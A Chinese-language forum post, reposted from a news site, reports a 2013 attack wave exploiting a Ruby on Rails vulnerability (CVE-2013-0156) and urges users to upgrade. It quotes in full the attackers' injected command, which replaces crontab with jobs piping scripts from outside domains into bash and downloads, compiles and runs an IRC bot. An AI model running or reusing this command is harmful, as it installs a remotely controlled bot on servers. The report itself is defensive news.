https://ruby-china.org/moneak en-us <p>在过去的几天里，攻击者已经越来越多地试图通过一个 Rails 框架的安全漏洞来攻陷服务器。成功的入侵者在服务器上安装一个机器人，使其等到来自 IRC 频道的进一步指示。</p> <p>在安全专家 Jeff Jarmoc 的博客中写到，攻击者是通过 CVE 2013-0156 漏洞试图攻击的。尽管该漏洞已经在 1 月份时关闭，但还有相当多的服务器仍然运行过时的 Ruby 版本。Jarmoc 称攻击者尝试注入如下命令：</p> <p>crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget <a href="http://88.198.20.247/k.c" rel="nofollow" target="_blank">http://88.198.20.247/k.c</a> -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget <a href="http://88.198.20.247/k" rel="nofollow" target="_blank">http://88.198.20.247/k</a> -O /tmp/k &amp;&amp; chmod +x /tmp/k &amp;&amp; /tmp/k</p> <p>这导致系统自动下载 bot (k.c) 编译然后执行，Jarmoc 在其博客上也公布了该机器人程序的源码。“k”尝试联系位于 cvv4you.ru 域的 IRC 服务器，然后加入 #rails 频道，在这里等待进一步的攻击指令。Jarmoc 称 k 程序可通过指令下载并执行任意代码。目前该 IRC 服务器已经能够不可用，至少现在的地址是不可用的。</p> <p>该机器人程序在进程列表中显示为 "- bash" ，启动时会同时创建一个 /tmp/tan.pid 文件以确保同一时间只有一个进程实例运行。所有使用 Rails 框架的用户应该确认正在使用当前的 Rails 版本，当前可靠的版本包括：3.2.13, 3.1.12 and 2.3.18.</p> <p>转自：<a href="http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html" rel="nofollow" target="_blank">http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html</a></p> moneak Wed, 05 Jun 2013 10:24:13 +0800 https://ruby-china.org/topics/11499 https://ruby-china.org/topics/11499